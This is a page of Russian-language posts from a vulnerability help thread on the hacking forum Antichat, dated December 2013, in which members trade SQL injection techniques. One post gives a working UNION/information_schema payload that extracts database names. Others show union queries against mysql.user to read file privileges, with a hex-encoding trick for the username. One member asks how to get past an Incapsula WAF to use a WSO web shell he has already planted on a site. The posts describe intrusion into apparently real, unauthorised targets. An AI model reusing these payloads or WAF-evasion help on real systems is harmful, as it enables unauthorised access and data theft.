HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2308 из 2438 « Первая < 13081808220822582298 2304 2305 2306 2307 2308 2309 2310 2311 2312 231823582408 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #23071  
Старый 12.12.2013, 22:16
Hapk
Guest
Сообщений: n/a
Провел на форуме:
70690

Репутация: -5
По умолчанию
Цитата:
Сообщение от qaz  
qaz said:
тебе ж сказали, в майскул разделение запросов работать небудет, ты хоть читаешь что тебе пишут или нет?
Бля не так просто понял!
 
Ответить с цитированием

  #23072  
Старый 13.12.2013, 02:42
BOSS
Новичок
Регистрация: 15.06.2010
Сообщений: 0
Провел на форуме:
16546

Репутация: 0
По умолчанию
Подскажите какая веб-уязвимости сейчас являются наиболее распространенными? Очень хочется начать изучать веб-уязвимости, но естественно хочу начать с актуального и распространенного.
 
Ответить с цитированием

  #23073  
Старый 13.12.2013, 07:20
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию
Сбербанк, С count(*)сложнее, но данные можно выводить:

Код:
Code:
lan=3&pid=0%26((1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)>(SELECT*FROM(SELECT*FROM information_schema.tables LIMIT 1)a1 WHERE @:=ascii(mid(TABLE_SCHEMA,1,1))))UNION(SELECT @)&type_id=2&raznovid=2&num_set=undefined
Возвращает код первого символа имени базы данных. Остаться выяснить ограничение длины у фильтра на число и можно приступать.

sabe, Здесь нормальный вывод, не blind. Если у вас получиться упростить запрос - это хорошо, но на некоторых запросах БД может надолго зависнуть, осторожно.
 
Ответить с цитированием

  #23074  
Старый 13.12.2013, 11:41
-=Cerberus=-
Guest
Сообщений: n/a
Провел на форуме:
343026

Репутация: 391
По умолчанию
Доброго времени суток ачатовцы!

подскажите как обойти Incapsula WAF

есть шелл WSO. Пытаясь его открыть, когда как, то пускает, то нет, но оказавшись внутри не могу ничего исполнить сразу ловлю бан. Админки прикрыли, так что шелл последняя зацепка.

может быть кто нибудь сталкивался с этим зверем и есть решение?

судя по отчету сравнительного тестирования Incapsula WAF vs CloudFlare пробелы в защите имеются

ХЭЭЭЛППП МИ!!!

p.s Эта хрень таскает по всему сайту свои кукисы, может быть валидность вызываемых страниц сайта завязана на поле Referer и этих куках
 
Ответить с цитированием

  #23075  
Старый 14.12.2013, 02:55
psihoz26
Guest
Сообщений: n/a
Провел на форуме:
182660

Репутация: 324
По умолчанию
Код:
Code:
https://e-pay.by/https://e-pay.by/?invaliduser
https://e-pay.by/https://e-pay.by/
https://e-pay.by/https://e-pay.by/news?page=9
что это такое?
 
Ответить с цитированием

  #23076  
Старый 14.12.2013, 15:06
MrKloud
Guest
Сообщений: n/a
Провел на форуме:
1743

Репутация: 0
По умолчанию
Добрый день! Пытаюсь посмотреть, есть ли файловые привилегии у юзера, но пишет, мол в доступе отказано.

Цитата:
Сообщение от None  
User lormedi_askort already has more than 'max_user_connections' active connections...
Цитата:
Сообщение от None  
site.com/?item_id=5762+union+select+1,file_priv,3,4+from+my sql.user+where+user=lormedi_askort+--+
 
Ответить с цитированием

  #23077  
Старый 14.12.2013, 19:07
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию
Цитата:
Сообщение от MrKloud  
MrKloud said:
Добрый день! Пытаюсь посмотреть, есть ли файловые привилегии у юзера, но пишет, мол в доступе отказано.
если используешь запрос по выборке и кавычек нет, то к нужной записи в колонке надо хексить, пример:

Цитата:
Сообщение от None  
site.com/?item_id=5762+union+select+1,file_priv,3,4+from+my sql.user+where+user=0x6C6F726D6564695F61736B6F7274 +--+
 
Ответить с цитированием

  #23078  
Старый 14.12.2013, 19:53
MrKloud
Guest
Сообщений: n/a
Провел на форуме:
1743

Репутация: 0
По умолчанию
Цитата:
Сообщение от winstrool  
winstrool said:
если используешь запрос по выборке и кавычек нет, то к нужной записи в колонке надо хексить, пример:
То же самое.
 
Ответить с цитированием

  #23079  
Старый 14.12.2013, 20:15
zombak18
Guest
Сообщений: n/a
Провел на форуме:
12404

Репутация: 0
По умолчанию
Как можно записать, чтобы значение было больше определнного..

К примеру where value=больше50

Что то понять не могу как это записать
 
Ответить с цитированием

  #23080  
Старый 14.12.2013, 20:20
eclipse
Guest
Сообщений: n/a
Провел на форуме:
30555

Репутация: 85
По умолчанию
Цитата:
Сообщение от zombak18  
zombak18 said:
Как можно записать, чтобы значение было больше определнного..
К примеру where value=больше50
Что то понять не могу как это записать
Тебе сюда
 
Ответить с цитированием
Ответ
Страница 2308 из 2438 « Первая < 13081808220822582298 2304 2305 2306 2307 2308 2309 2310 2311 2312 231823582408 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT.XYZ